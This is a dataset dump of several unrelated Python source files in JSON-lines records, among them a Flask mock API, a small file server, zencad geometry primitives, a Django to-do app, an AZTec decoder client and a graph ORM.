plt.scatter(x_list_in_gen, y_list_in_gen, c = 'b')\n                plt_best = plt.scatter(scatter_best_x, scatter_best_y, c = 'r')\n                plt.pause(0.01)\n                plt_x.remove()\n                plt_best.remove()\n\n        end_time = time.time() - start_time\n\n        print('Optimal x: ', x)\n        
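        # Sanity check (illustrative): y_list was built by applying
        # fitness_function to x_list, so the reported optimum satisfies
        #   self.fitness_function(x) == min(y_list)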
print('Computing time:', end_time)\n return x","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"291780712","text":"\"\"\"\nExtract 1024-bit ECFP6 fingerprints for PRISM predicted structures\nfor clusters in a large set of complete bacterial genomes.\n\"\"\"\n\nimport json\nimport os\nimport pandas as pd\nfrom rdkit.Chem import AllChem\nfrom tqdm import tqdm\n\n# set directory \ngit_dir = os.path.expanduser(\"~/git/prism-4-paper\")\nos.chdir(git_dir)\n\n# import functions\nfrom functions import clean_mol, get_bit_vector\n\n# set up I/O tuples\nio = [# complete genomes\n [git_dir + \"/data/genomes/complete-genomes-NCBI-11282018-derep.txt\",\n git_dir + \"/data/genomes/prism_grid/output\",\n git_dir + \"/data/analysis/genomes/fingerprints_prism.csv\"],\n # metagenome-assembled genomes\n [git_dir + \"/data/genomes/PRJNA348753-genomes.txt\",\n git_dir + \"/data/MAGs/prism_lite/structure_pred\",\n git_dir + \"/data/analysis/MAGs/fingerprints_prism.csv\"]]\n## run #2: just get complete genomes\nio = [io[0]]\n\nfor io_tuple in io: \n print(\"analyzing I/O pair: \" + io_tuple[1])\n \n # read all genomes from file\n genomes = []\n derep_file = io_tuple[0]\n with open(derep_file) as f:\n lines = f.readlines()\n genomes = [line.strip('\\n').replace(\".gz\", \"\") for line in lines]\n \n # process each genome\n res = pd.DataFrame()\n for genome in tqdm(genomes):\n print(genome + \"...\")\n output_file = io_tuple[1] + \"/\" + genome + \".json\"\n if os.path.isfile(output_file) and os.path.getsize(output_file) > 0:\n f = open(output_file)\n root = json.load(f)\n prism = root['prism_results']\n prism_clusters = prism['clusters']\n for cluster_idx, cluster in enumerate(prism_clusters):\n pathways = cluster['biosynthetic_pathways']\n pred_smiles = [pathway['smiles'] for pathway in pathways]\n for smiles in pred_smiles:\n mol = None\n try:\n mol = clean_mol(smiles)\n except ValueError:\n continue\n fp = AllChem.GetMorganFingerprintAsBitVect(\n mol, 3, nBits=1024)\n vec = get_bit_vector(fp)\n row = pd.concat([\n pd.DataFrame({'genome': genome, \n 'cluster': cluster_idx, \n 'smiles': smiles }, index=[0]),\n pd.DataFrame(vec.reshape(-1, len(vec)))], axis=1)\n res = res.append(row) \n \n # write\n output_file = io_tuple[2] + \".gz\"\n # confirm directory exists\n output_dir = os.path.dirname(output_file)\n if not os.path.isdir(output_dir): \n os.makedirs(output_dir)\n \n res.to_csv(output_file, index=False, compression='gzip')\n","sub_path":"extract-prism-fingerprints.py","file_name":"extract-prism-fingerprints.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"626454607","text":"import pyservoce\nfrom zencad.lazifier import lazy, shape_generator, nocached_shape_generator\nfrom zencad.util import angle_pair, deg, points\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef nullshape():\n return pyservoce.box(1,1,1) - pyservoce.box(1,1,1)\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef box(size, arg2=None, arg3=None, center=False, shell=False):\n if arg3 == None:\n if hasattr(size, \"__getitem__\"):\n m = pyservoce.box(size[0], size[1], size[2], center)\n else:\n m = pyservoce.box(size, size, size, center)\n else:\n m = pyservoce.box(size, arg2, arg3, center)\n\n if shell:\n return m.shells()[0]\n else:\n return m\n\n\ndef cube(*args, **kwargs):\n return box(*args, 
**kwargs)\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef sphere(r, yaw=None, pitch=None, shell=False):\n    if yaw is not None:\n        if yaw > deg(360):\n            raise Exception(\"Wrong parameter `yaw`. yaw defined in [0, 2*pi]\")\n\n    if pitch is not None:\n        pitch = angle_pair(pitch)\n\n        if pitch[0] > pitch[1]:\n            raise Exception(\n                \"Wrong parameter `pitch`. pitch[0] should be less than pitch[1]\"\n            )\n\n        if (\n            pitch[0] > deg(90)\n            or pitch[1] > deg(90)\n            or pitch[0] < -deg(90)\n            or pitch[1] < -deg(90)\n        ):\n            raise Exception(\n                \"Wrong parameter `pitch`. pitch[0] and pitch[1] defined in [-pi/2, pi/2]\"\n            )\n\n    if yaw is not None:\n        if pitch is not None:\n            m = pyservoce.sphere(r=r, pitch0=pitch[0], pitch1=pitch[1], yaw=yaw)\n        else:\n            m = pyservoce.sphere(r=r, yaw=yaw)\n\n    else:\n        if pitch is not None:\n            m = pyservoce.sphere(r=r, pitch0=pitch[0], pitch1=pitch[1])\n        else:\n            m = pyservoce.sphere(r=r)\n\n    if shell:\n        return m.shells()[0]\n    else:\n        return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef cylinder(r, h, center=False, yaw=None, shell=False):\n    if yaw is None:\n        m = pyservoce.cylinder(r=r, h=h, center=center)\n    else:\n        m = pyservoce.cylinder(r=r, h=h, yaw=yaw, center=center)\n\n    if shell:\n        return m.shells()[0]\n    else:\n        return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef cone(r1, r2, h, center=False, yaw=None, shell=False):\n    if yaw is None:\n        m = pyservoce.cone(r1=r1, r2=r2, h=h, center=center)\n    else:\n        m = pyservoce.cone(r1=r1, r2=r2, h=h, yaw=yaw, center=center)\n\n    if shell:\n        return m.shells()[0]\n    else:\n        return m\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef torus(r1, r2, yaw=None, pitch=None, shell=False):\n    if pitch is not None:\n        pitch = angle_pair(pitch)\n        if yaw is not None:\n            m = pyservoce.torus(\n                r1=r1, r2=r2, pitch0=pitch[0], pitch1=pitch[1], yaw=yaw\n            )\n        else:\n            m = pyservoce.torus(r1=r1, r2=r2, pitch0=pitch[0], pitch1=pitch[1])\n    else:\n        if yaw is not None:\n            m = pyservoce.torus(r1=r1, r2=r2, yaw=yaw)\n        else:\n            #return pyservoce.torus(r1=r1, r2=r2)\n            m = (pyservoce.torus(r1=r1, r2=r2, yaw=deg(180)) \n                + pyservoce.torus(r1=r1, r2=r2, yaw=deg(180)).rotateZ(deg(180)))\n\n    if shell:\n        return m.shells()[0]\n    else:\n        return m\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef halfspace():\n    return pyservoce.halfspace()\n\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef polyhedron(pnts, faces, shell=False):\n    pnts = points(pnts)\n    shl = pyservoce.polyhedron_shell(pnts, faces)\n\n    if shell:\n        return shl\n    else:\n        return shl.fill()\n\n@lazy.lazy(cls=nocached_shape_generator)\ndef make_solid(*args, **kwargs):\n    return pyservoce.make_solid(*args, **kwargs)\n\n@lazy.lazy\ndef convex_hull(pnts, incremental=False, qhull_options=None):\n    from scipy.spatial import ConvexHull\n\n    faces = ConvexHull(pnts, incremental=incremental, qhull_options=qhull_options).simplices\n\n    return faces\n\n@lazy.lazy(cls=shape_generator)\ndef convex_hull_shape(pnts, shell=False, incremental=False, qhull_options=None):\n    from scipy.spatial import ConvexHull\n\n    faces = ConvexHull(pnts, incremental, qhull_options).simplices\n    m = polyhedron(pnts, faces, shell=shell)\n\n    return m","sub_path":"zencad/geom/prim3d.py","file_name":"prim3d.py","file_ext":"py","file_size_in_byte":4438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"321266621","text":"#encoding:utf-8\nimport dataController \nfrom flask import *\nfrom flask import request\nfrom 
flask import json\nfrom flask import jsonify\nfrom flask import make_response\nimport types\nimport time\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\napp = Flask(__name__)\n\nupdate=1.0\ndlc_ret=\"old\"\nband_num=0\nlink_num=0\nlinkloss_num=0\ncap_num=0\nfirstband=2576024104\nbanddata=2576024104\n\n@app.route(\"/setfile/api//file/\")\ndef setfile(api,file):\n print(file)\n try:\n ret=dataController.setApiFile(api,file)\n if(ret==None):\n return \"ok\"\n else:\n return ret\n except:\n return \"except cause\"\n\n@app.route('/getdata', methods=['POST','GET'])\ndef predictApi(): \n if request.method == 'POST':\n #print(dir(request))\n data=request.data\n d=\"threashold_params\"\n print(json.dumps(d))\n if(data=='\"threashold_params\"'):\n b= {\"k_low_whole_usage\": 0.7001, \"k_high_whole_usage\": 1.1471, \"k_low_time\": 0.0171, \"k_high_time\": 0.0054, \"b_high\": 1.0409, \"b_low\": -1.3845}\n print(type(b))\n c=json.dumps(b)\n return c\n else:\n b= (17,70.6) \n c=json.dumps(b)\n return c\n \n else:\n return \"this is get method\"\n\n\n\n@app.route('/api/bandwidth/', methods=['POST','GET'])\ndef bandwidthApi(): \n if request.method == 'POST':\n data=request.data\n \n #global band_num\n global firstband \n print(data)\n print(type(data))\n print(json.loads(data)) \n if(json.loads(data)['queries'][0]['metric']=='TOPNODEBANDWIDTH.bandwidth.ha.ifHCOutOctets'):\n print(\"---------aaa\")\n tm=int(time.time())\n data=dataController.getApiData('bandswidth')\n #band_data=dataController.getApiData('banddata')\n mod_tmp=json.loads(data)\n #data_tmp=json.loads(band_data)\n print(len(mod_tmp))\n #print(len(data_tmp))\n mod_tmp[0]['dps'][tm]=firstband\n for j in range(1,len(mod_tmp)):\n #print(j)\n #mod_tmp[j]['dps'][tm]=data_tmp[band_num][j]\n mod_tmp[j]['dps'][tm]=banddata\n #band_num=band_num+1\n #if(band_num>=len(data_tmp)):\n # band_num=0\n firstband=firstband+10000000\n if(firstband>12576024104):\n firstband=banddata\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n else:\n data=[]\n return json.dumps(data) \n else:\n return \"this is get method\"\n\n@app.route(\"/api/linkdata/\",methods=['POST','GET'])\ndef linkDataApi():\n ret='{}'\n if request.method == 'POST':\n try:\n data=request.data\n global link_num\n global linkloss_num\n tm=int(time.time())\n if(json.loads(data)['queries'][0]['metric']=='topnode_link_monitor.topnodeping.latency'):\n mod=dataController.getApiData('link')\n mod_data=dataController.getApiData('linkdata')\n print(mod)\n print(mod_data)\n mod_tmp=json.loads(mod)\n data_tmp=json.loads(mod_data)\n print(len(mod_tmp))\n for j in range(len(mod_tmp)):\n mod_tmp[j]['dps'][tm]=data_tmp[link_num][j]\n link_num=link_num+1\n if(link_num>=len(data_tmp)-1):\n link_num=0\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n else:\n mod=dataController.getApiData('linkloss')\n mod_data=dataController.getApiData('linklossdata')\n print(mod)\n print(mod_data)\n mod_tmp=json.loads(mod)\n\n data_tmp=json.loads(mod_data)\n for j in range(len(mod_tmp)):\n mod_tmp[j]['dps'][tm]=data_tmp[linkloss_num][j]\n linkloss_num=linkloss_num+1\n if(linkloss_num>=len(data_tmp)-1):\n linkloss_num=0\n res=make_response(json.dumps(mod_tmp))\n res.headers['Content-Type']=\"application/json\"\n return res \n except Exception as e:\n print(e)\n return \"exception\"\n\n else:\n return \"this is get method\"\n\n\n@app.route(\"/api/capacity/\",methods=['POST','GET'])\ndef 
serviceCapacity(): \n    if request.method == 'POST':\n        data=request.data\n        print(data)\n        global cap_num\n        redata=json.loads(data) \n        if(redata['queries'][0]['metric']=='base.net_interface_flow_out'):\n            tm=int(time.time())\n            data=dataController.getApiData('capacity')\n            band_data=dataController.getApiData('capacitydata')\n            mod_tmp=json.loads(data)\n            data_tmp=json.loads(band_data)\n            print(len(mod_tmp))\n            print(len(data_tmp))\n            for j in range(len(mod_tmp)):\n                mod_tmp[j]['dps'][tm]=data_tmp[cap_num][j]\n            cap_num=cap_num+1\n            if(cap_num>=len(data_tmp)):\n                cap_num=0\n            res=make_response(json.dumps(mod_tmp))\n            res.headers['Content-Type']=\"application/json\"\n            return res\n        else:\n            data=[]\n            res=make_response(json.dumps(data))\n            res.headers['Content-Type']=\"application/json\"\n            return res\n\n    else:\n        return \"this is get method\"\n\n\n@app.route(\"/bsp/node/nodestatuslist\")\ndef nodestatusApi():\n    ret='{}'\n    try:\n        data=dataController.getApiData('nodestatus')\n        print(data)\n        if isinstance(data, dict):\n            ret=json.dumps(data)\n            return ret\n        if isinstance(data, str):\n            return data\n        if isinstance(data, list):\n            ret=json.dumps(data)\n            return ret\n        else:\n            return '{\"status\":\"type is not string/dict/list\"}'\n    except Exception:\n        return '{\"status\":\"exception\"}'\n\n\n@app.route(\"/dlc/router/getNameidInfo/\")\ndef dlcnameidApi():\n    ret='{}'\n    try:\n        data=dataController.getApiData('dlcnameid')\n        t=int(round(time.time()*1000,0))\n        print(type(data))\n        if(data==''):\n            return ret\n        if isinstance(data, dict):\n            data['ctime']=t\n            ret=json.dumps(data)\n            return ret\n        if isinstance(data, str):\n            tmp=json.loads(data)\n            for i in range(len(tmp)):\n                tmp[i]['ctime']=t\n            res=make_response(json.dumps(tmp))\n            res.headers['Content-Type']=\"application/json\"\n            return res\n        if isinstance(data, list):\n            print(data)\n            for i in range(len(data)):\n                data[i]['ctime']=t\n            return jsonify(data)\n\n        else:\n            return '{\"status\":\"type is not string/dict/list\"}'\n    except Exception as e:\n        print(e)\n        return \"exception\"\n\n@app.route('/dlc/router/cmd/', methods=['POST','GET'])\ndef dlcresult():\n    global update\n    global dlc_ret\n    if request.method == 'POST':\n        try:\n            nameid=\"init\"\n            \n            data = request.data\n            print(data)\n            print(type(data))\n            dlcdata=json.loads(data)\n            print(dlcdata)\n            if(isinstance(dlc_ret,list) and (dlc_ret[0][\"cmdid\"] == dlcdata[0][\"cmdid\"])):\n                dlc_ret.append(dlcdata[0])\n            else:\n                dlc_ret=dlcdata\n            \n            update=time.time()\n            print(update)\n            nameid=dlcdata[0]['nameid']\n            cmdid=dlcdata[0]['cmdid']\n            ret=[{\"resultmess\": \"OK\", \"resultcode\": \"SUCCESS\", \"nameid\": nameid}]\n            lastret=json.dumps(ret)\n            fret=json.dumps(dlc_ret)\n            file_object = open('/root/xhn/dlc_ret/'+str(cmdid), 'w')\n            file_object.write(fret)\n            file_object.close()\n            return lastret\n        except Exception as e:\n            print(e)\n            return \"exception\"\n    else:\n        return \"method error\"\n\n@app.route('/dlc/result/time/
    \" % logo)\n self.response.write(\"

    \" + event + \"

    \")\n self.response.write(\"

    \" + date + \"

\n{entries}\n</table>\n</body>\n</html>\n'''\n\nclass Path(pathclass.Path):\n    '''\n    Add some server-specific abilities to the Pathclass\n    '''\n    def __init__(self, path):\n        path = urllib.parse.unquote(path)\n        path = path.strip('/')\n        pathclass.Path.__init__(self, path)\n\n    @property\n    def allowed(self):\n        return any(self in okay for okay in OKAY_PATHS)\n\n    def anchor(self, display_name=None):\n        self.correct_case()\n        if display_name is None:\n            display_name = self.basename\n\n        if self.is_dir:\n            # Folder emoji\n            icon = '\\U0001F4C1'\n        else:\n            # Diamond emoji, because there's not one for files.\n            icon = '\\U0001F48E'\n\n        #print('anchor', path)\n        if display_name.endswith('.placeholder'):\n            a = '<a>{icon} {display}</a>'\n        else:\n            a = '<a href=\"{full}\">{icon} {display}</a>'\n        a = a.format(\n            full=self.url_path,\n            icon=icon,\n            display=display_name,\n        )\n        return a\n\n    def table_row(self, display_name=None, shaded=False):\n        form = '<tr style=\"background-color:#{bg}\"><td>{anchor}</td><td>{size}</td></tr>'\n        size = self.size\n        if size is None:\n            size = ''\n        else:\n            size = bytestring.bytestring(size)\n\n        bg = 'ddd' if shaded else 'fff'\n        row = form.format(\n            bg=bg,\n            anchor=self.anchor(display_name=display_name),\n            size=size,\n        )\n        return row\n\n    @property\n    def url_path(self):\n        url = self.relative_path\n        url = url.replace(os.sep, '/')\n        url = '/' + url\n        url = urllib.parse.quote(url)\n        return url\n\nOKAY_PATHS = set(Path(p) for p in OKAY_PATHS)\n\nclass RequestHandler(http.server.BaseHTTPRequestHandler):\n    def write(self, data):\n        if isinstance(data, str):\n            data = data.encode('utf-8')\n        if isinstance(data, types.GeneratorType):\n            for chunk in data:\n                self.wfile.write(chunk)\n                RATELIMITER.limit(len(chunk))\n        else:\n            self.wfile.write(data)\n\n    def read_filebytes(self, path, range_min=None, range_max=None):\n        #print(path)\n\n        if path.is_file:\n            if range_min is None:\n                range_min = 0\n\n            if range_max is None:\n                range_max = path.size\n\n            range_span = range_max - range_min\n\n            #print('read span', range_min, range_max, range_span)\n            f = open(path.absolute_path, 'rb')\n            f.seek(range_min)\n            sent_amount = 0\n            while sent_amount < range_span:\n                chunk = f.read(FILE_READ_CHUNK)\n                if len(chunk) == 0:\n                    break\n\n                yield chunk\n                sent_amount += len(chunk)\n\n            #print('I read', len(fr))\n            f.close()\n\n        elif path.is_dir:\n            text = generate_opendir(path)\n            text = text.encode('utf-8')\n            yield text\n\n        else:\n            self.send_error(404)\n            yield bytes()\n\n    def do_GET(self):\n        #print(dir(self))\n        path = Path(self.path)\n        if self.send_path_validation_error(path):\n            return\n\n        range_min = None\n        range_max = None\n\n        status_code = 200\n        headers = {}\n\n        if path.is_file:\n            file_size = path.size\n            if 'range' in self.headers:\n                desired_range = self.headers['range']\n                desired_range = desired_range.lower()\n                desired_range = desired_range.split('bytes=')[-1]\n\n                helper = lambda x: int(x) if x and x.isdigit() else None\n                if '-' in desired_range:\n                    (desired_min, desired_max) = desired_range.split('-')\n                    #print('desire', desired_min, desired_max)\n                    range_min = helper(desired_min)\n                    range_max = helper(desired_max)\n                else:\n                    range_min = helper(desired_range)\n\n                if range_min is None:\n                    range_min = 0\n                if range_max is None:\n                    range_max = file_size\n\n                # because ranges are 0 indexed\n                range_max = min(range_max, file_size - 1)\n                range_min = max(range_min, 0)\n\n                status_code = 206\n                range_header = 'bytes {min}-{max}/{outof}'.format(\n                    min=range_min,\n                    max=range_max,\n                    outof=file_size,\n                )\n                headers['Content-Range'] = range_header\n                headers['Accept-Ranges'] = 'bytes'\n                content_length = (range_max - range_min) + 1\n\n            else:\n                content_length = file_size\n\n            
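            # HTTP byte ranges are inclusive on both ends, which is why the
            # 206 branch above sets content_length = (range_max - range_min) + 1;
            # e.g. 'Content-Range: bytes 0-499/1234' describes exactly 500 bytes.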
headers['Content-length'] = content_length\n\n mime = mimetypes.guess_type(path.absolute_path)[0]\n if mime is not None:\n #print(mime)\n headers['Content-type'] = mime\n\n self.send_response(status_code)\n for (key, value) in headers.items():\n self.send_header(key, value)\n\n d = self.read_filebytes(path, range_min=range_min, range_max=range_max)\n #print('write')\n self.end_headers()\n self.write(d)\n\n def do_HEAD(self):\n path = Path(self.path)\n if self.send_path_validation_error(path):\n return\n\n status_code = 200\n self.send_response(status_code)\n\n if path.is_dir:\n mime = 'text/html'\n else:\n mime = mimetypes.guess_type(path.absolute_path)[0]\n self.send_header('Content-length', path.size)\n\n if mime is not None:\n self.send_header('Content-type', mime)\n\n self.end_headers()\n\n def send_path_validation_error(self, path):\n if not path.allowed:\n self.send_error(403, 'Stop that!')\n return True\n return False\n\n\nclass ThreadedServer(socketserver.ThreadingMixIn, http.server.HTTPServer):\n '''\n Thanks root and twasbrillig http://stackoverflow.com/a/14089457\n '''\n pass\n\n\ndef generate_opendir(path):\n #print('Listdir:', path)\n items = os.listdir(path.absolute_path)\n items = [os.path.join(path.absolute_path, f) for f in items]\n #print(items)\n\n # This places directories above files, each ordered alphabetically\n items.sort(key=str.lower)\n directories = []\n files = []\n for item in items:\n if os.path.isdir(item):\n directories.append(item)\n else:\n files.append(item)\n\n items = directories + files\n items = [Path(f) for f in items]\n entries = []\n\n if any(path.absolute_path == okay.absolute_path for okay in OKAY_PATHS):\n # This is different than a permission check, we're seeing if they're\n # actually at the top, in which case they don't need an up button.\n pass\n else:\n entry = path.parent.table_row(display_name='up')\n entries.append(entry)\n\n shaded = True\n for item in items:\n entry = item.table_row(shaded=shaded)\n entries.append(entry)\n shaded = not shaded\n\n entries = '\\n'.join(entries)\n text = OPENDIR_TEMPLATE.format(entries=entries)\n return text\n\ndef generate_random_filename(original_filename='', length=8):\n import random\n bits = length * 44\n bits = random.getrandbits(bits)\n identifier = '{:x}'.format(bits).rjust(length, '0')\n return identifier\n\ndef main():\n server = ThreadedServer(('', int(sys.argv[1] or 32768)), RequestHandler)\n print('server starting')\n server.serve_forever()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ServerReference/simpleserver.py","file_name":"simpleserver.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244961985","text":"from typing import Text\nfrom django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom form import CreateNewList\nfrom .models import ToDoList,Item\n# Create your views here.\n\ndef index(response ,id): ##First view\n ls = ToDoList.objects.get(id=id)\n\n if response.method == \"POST\":\n print(response.POST)\n if response.POST.get(\"save\"):\n for item in ls.item_set.all():\n if response.POST.get(\"c\" + str(item.id)) == \"clicked\":\n item.complete = True\n else: \n item.complete = False\n item.save()\n \n\n \n elif response.POST.get(\"New Item\"):\n txt = response.POST.get(\"content\")\n if len(txt)>2:\n ls.item_set.create(text=txt,complete=False)\n else:\n print(\"Invalid\")\n return 
render(response,\"main/DisplayList.html\",{\"ls\":ls})\n\ndef home(response): \n return render(response,\"main/home.html\",{})\n\ndef create(response): \n if response.method == \"POST\":\n form = CreateNewList(response.POST)\n if form.is_valid():\n n = form.cleaned_data[\"name\"]\n t = ToDoList(name=n)\n t.save()\n return HttpResponseRedirect(\"/%i\" %t.id)\n else: \n form = CreateNewList()\n\n return render(response,\"main/create.html\",{\"form\":form})\n\n\n \n","sub_path":"MyFirstSite/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158201183","text":"from __future__ import division, print_function\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass RewardViewer(object):\n def __init__(self):\n self.rewards = []\n\n def update(self, reward):\n self.rewards.append(reward)\n self.display()\n\n def display(self):\n plt.figure(num='Rewards')\n plt.clf()\n plt.title('Total reward')\n plt.xlabel('Episode')\n plt.ylabel('Reward')\n plt.plot(self.rewards)\n\n # Take 100 episode averages and plot them too\n if len(self.rewards) >= 100:\n means = np.hstack((np.zeros((100,)), np.convolve(self.rewards, np.ones((100,)) / 100, mode='valid')))\n plt.plot(means)\n else:\n plt.plot(np.zeros(np.shape(self.rewards)))\n\n plt.pause(0.001)\n plt.plot(block=False)\n","sub_path":"rl_agents/trainer/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"41860150","text":"#!/usr/bin/python\n\"\"\"\nUse a classifier cascade to identify matches in a given image.\n\"\"\"\nimport cv2\n#import cv2.cv as cv\n\ndef detect(img):\n '''\n The detect function processes a file to look for matches, and returns a list\n of tuples (x,y) containing the central point of each positive detection.\n '''\n cascade = cv2.CascadeClassifier()\n cascade.load('../data/cascade/wf_cascade.xml')\n \n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n rects = cascade.detectMultiScale(img_gray, scaleFactor=1.1, minNeighbors=1, minSize=(10,10), maxSize=(25,25))\n matches = []\n \n for r in rects:\n xcentre = r[0] + r[2] / 2\n ycentre = r[1] + r[3] / 2\n matches.append((xcentre,ycentre))\n \n return matches;\n \n #filtered_matches = removematches.removematches(img, matches)\n #after removing false positives\n #return filtered_matches\n\n\n \n","sub_path":"version1.2/src/cascadedetect.py","file_name":"cascadedetect.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"312842302","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3350)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\pelock\\aztecdecoder.py\n# Compiled at: 2016-08-08 18:04:20\n# Size of source mod 2**32: 3444 bytes\nimport struct, io, json, requests\n\nclass AZTecDecoder(object):\n API_URL = 'https://www.pelock.com/api/aztec-decoder/v1'\n _api_key = ''\n\n def __init__(self, api_key):\n \"\"\"Inicjalizacja klasy AZTecDecoder\n\n :param api_key: Klucz do uslugi WebApi\n \"\"\"\n self._api_key = api_key\n\n def decode_text(self, text):\n \"\"\"Dekodowanie zaszyfrowanej wartosci tekstowej do\n wyjsciowej tablicy w formacie JSON.\n\n :param text: Odczytana wartosc z kodem AZTEC2D w formie ASCII\n :return Rozkodowana tablica 
JSON elements or None on error\n        :rtype object\n        \"\"\"\n        params = {'command': 'decode-text', 'text': text}\n        return self.post_request(params)\n\n    def decode_text_from_file(self, text_file_path):\n        \"\"\"Decode an encrypted text value read\n        from the given file into an output array in\n        JSON format.\n\n        :param text_file_path: Path to the file holding the AZTEC2D code value\n        :return Decoded array of JSON elements or None on error\n        :rtype object\n        \"\"\"\n        with open(text_file_path, 'r') as f:\n            text = f.read()\n        if text:\n            return self.decode_text(text)\n\n    def decode_image_from_file(self, image_file_path):\n        \"\"\"Decode an encrypted value encoded\n        in a PNG or JPG/JPEG image into an output array\n        in JSON format.\n\n        :param image_file_path: Path to the image with the AZTEC2D code\n        :return Decoded array of JSON elements or None on error\n        :rtype object\n        \"\"\"\n        params = {'command': 'decode-image', 'image': image_file_path}\n        return self.post_request(params)\n\n    def post_request(self, params_array):\n        \"\"\"Send a POST request to the WebApi server\n\n        :param params_array: Array of parameters for the POST request\n        :return: Decoded array of JSON elements or None on error\n        :rtype: object\n        \"\"\"\n        if not self._api_key:\n            return\n        else:\n            params_array['key'] = self._api_key\n            if 'image' in params_array:\n                files = {'image': open(params_array['image'], 'rb')}\n                params_array.pop('image', None)\n                response = requests.post(self.API_URL, files=files, data=params_array)\n            else:\n                response = requests.post(self.API_URL, data=params_array)\n            if response and response.ok:\n                return json.loads(response.text)\n            return","sub_path":"pycfiles/aztecdecoder-1.0.0-py3.5/aztecdecoder.cpython-35.py","file_name":"aztecdecoder.cpython-35.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"399883457","text":"from collections import OrderedDict\nimport inspect\nimport re\nfrom uuid import UUID\n\nfrom thunderdome import columns\nfrom thunderdome.connection import execute_query, create_key_index, ThunderdomeQueryError\nfrom thunderdome.exceptions import ModelException, ValidationError, DoesNotExist, MultipleObjectsReturned, ThunderdomeException, WrongElementType\nfrom thunderdome.gremlin import BaseGremlinMethod, GremlinMethod\n\n\n#dict of node and edge types for rehydrating results\nvertex_types = {}\nedge_types = {}\n\n\nclass ElementDefinitionException(ModelException): pass\nclass SaveStrategyException(ModelException): pass\n\n\nclass BaseElement(object):\n    \"\"\"\n    The base model class, don't inherit from this, inherit from Model, defined below\n    \"\"\"\n\n    # When true this will prepend the module name to the type name of the class\n    __use_module_name__ = False\n    __default_save_strategy__ = columns.SAVE_ALWAYS\n    \n    class DoesNotExist(DoesNotExist): pass\n    class MultipleObjectsReturned(MultipleObjectsReturned): pass\n    class WrongElementType(WrongElementType): pass\n\n    def __init__(self, **values):\n        \"\"\"\n        Initialize the element with the given properties.\n\n        :param values: The properties for this element\n        :type values: dict\n        \n        \"\"\"\n        self.eid = values.get('_id')\n        self._values = {}\n        for name, column in self._columns.items():\n            value = values.get(name, None)\n            if value is not None: value = column.to_python(value)\n            value_mngr = column.value_manager(self, column, value)\n            self._values[name] = value_mngr\n\n    def __eq__(self, other):\n        \"\"\"\n        Check for equality 
between two elements.\n\n :param other: Element to be compared to\n :type other: BaseElement\n :rtype: boolean\n \n \"\"\"\n if not isinstance(other, BaseElement): return False\n return self.as_dict() == other.as_dict() and self.eid == other.eid\n\n def __ne__(self, other):\n \"\"\"\n Check for inequality between two elements.\n\n :param other: Element to be compared to\n :type other: BaseElement\n :rtype: boolean\n \n \"\"\"\n return not self.__eq__(other)\n\n @classmethod\n def _type_name(cls, manual_name):\n \"\"\"\n Returns the column family name if it has been defined, otherwise it\n creates it from the module and class name.\n\n :param manual_name: Name to override the default type name\n :type manual_name: str\n :rtype: str\n \n \"\"\"\n cf_name = ''\n if manual_name:\n cf_name = manual_name.lower()\n else:\n camelcase = re.compile(r'([a-z])([A-Z])')\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\n \n cf_name += ccase(cls.__name__)\n cf_name = cf_name.lower()\n if cls.__use_module_name__:\n cf_name = cls.__module__ + '_{}'.format(cf_name)\n return cf_name\n\n def validate_field(self, field_name, val):\n \"\"\"\n Perform the validations associated with the field with the given name on\n the value passed.\n\n :param field_name: The name of column whose validations will be run\n :type field_name: str\n :param val: The value to be validated\n :type val: mixed\n \n \"\"\"\n return self._columns[field_name].validate(val)\n\n def validate(self):\n \"\"\"Cleans and validates the field values\"\"\"\n for name in self._columns.keys():\n func_name = 'validate_{}'.format(name)\n val = getattr(self, name)\n if hasattr(self, func_name):\n val = getattr(self, func_name)(val)\n else:\n val = self.validate_field(name, val)\n setattr(self, name, val)\n\n def as_dict(self):\n \"\"\"\n Returns a map of column names to cleaned values\n\n :rtype: dict\n \n \"\"\"\n values = {}\n for name, col in self._columns.items():\n values[name] = col.to_database(getattr(self, name, None))\n return values\n\n def as_save_params(self):\n \"\"\"\n Returns a map of column names to cleaned values containing only the\n columns which should be persisted on save.\n\n :rtype: dict\n \n \"\"\"\n values = {}\n was_saved = self.eid is not None\n for name, col 